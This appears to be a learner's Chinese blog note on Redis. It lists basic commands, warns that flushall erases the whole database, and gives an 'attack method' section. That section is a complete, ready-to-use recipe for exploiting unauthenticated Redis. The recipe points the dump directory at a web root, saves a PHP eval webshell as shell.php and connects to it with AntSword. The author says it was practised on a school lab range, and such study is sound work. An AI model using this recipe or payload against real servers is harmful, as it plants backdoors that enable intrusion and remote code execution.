redis数据库基本命令
redis端口默认6379
1.redis基本命令
连接redis:
redis-cli -h 192.168.63.130
查看redis版本信息、一些具体信息、服务器版本信息等等:
192.168.63.130:6379>info
将变量x的值设为test:
192.168.63.130:6379>set x “test”
是把整个redis数据库删除,一般情况下不要用!!!
192.168.63.130:6379>flushall
查看所有键:
192.168.63.130:6379>KEYS *
获取默认的redis目录、和rdb文件名:可以在修改前先获取,然后走的时候再恢复。
192.168.63.130:6379>CONFIG GET dir
192.168.63.130:6379>CONFIG GET dbfilename
攻击方法:
写马
先连接redis-cli -h 30.10.0.6
从phpinfo中查到网站路径
config set dir /var/www/html/ 设置网站路径,这里必须提前知道网站的路径,这个可以在phpinfo信息中获取
config set dbfilename shell.php 创建文件
set webshell “<?php @eval($_POST[‘c’]);?>”
save
然后蚁剑连接即可,连接的是30.10.0.6/shell.php(这个给新手看下,因为我当初就不知道网站根目录是啥的,蚁剑都不会连,嘻嘻)
这里因为是用的学校靶场练习的,没有截图,手上只有一个当初用redis未授权访问写反弹shell的截图
至于redis未授权访问的其他玩法大家可以参考 https://www.cnblogs.com/bmjoker/p/9548962.html这篇文章